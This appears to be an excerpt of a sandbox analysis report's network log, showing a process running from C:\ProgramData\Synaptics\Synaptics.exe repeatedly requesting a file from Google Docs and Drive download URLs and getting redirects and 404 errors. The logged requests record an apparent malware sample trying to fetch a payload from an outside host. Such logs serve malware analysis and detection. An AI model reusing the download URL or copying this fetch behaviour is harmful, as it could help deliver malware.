                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              96192.168.2.750060216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:17 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:17 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-eKSSYaPImoTpMoplUwfFIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              97192.168.2.750061142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC45TP5API_KuVzuaa0nQtY-2iGr67v5evb1lZlPojpY9CGpaDSlE02H_G9fqAN00SEsqFVoqTc
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:17 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-C1uTYRIi_wRlxx44QYyFaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 51 45 69 7a 2d 6c 64 53 7a 58 65 48 41 6b 43 31 79 4a 59 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="0QEiz-ldSzXeHAkC1yJYdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              98192.168.2.750059216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:17 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:17 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Cu2_EyJh2xilYMKelrXDxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              99192.168.2.750062142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5UPOLAyyGVHB_Jg9r5T44xPn4_tiNj49FQzMruobX7Rk04jt-tLVzUTrbJILujoIDu
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:17 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ASsSPAv3a7LYEnm171xGcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 58 56 49 34 4c 72 4a 4a 79 2d 32 68 53 6d 71 4b 4c 77 66 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="wXVI4LrJJy-2hSmqKLwfPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              100192.168.2.750071216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              101192.168.2.750072142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              102192.168.2.750070216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              103192.168.2.750074142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:18 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              104192.168.2.750083216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:18 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:19 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:19 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-54DmI3N5ONy-4G4CwCD5Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              105192.168.2.750082216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:18 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:19 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:19 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-t5a2WFDocKAqW6YjwrBQxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              106192.168.2.750094216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:20 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:20 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Xx63Z5x5t3GTdFKkzd9-rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              107192.168.2.750095142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:20 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6rRixsXqRdKtI6V-8xHAHDegiAFV_lbMT_CoPS2__CifoQHiNyq-JCg8wBS2DvdzgGpvUoCw0
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:20 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
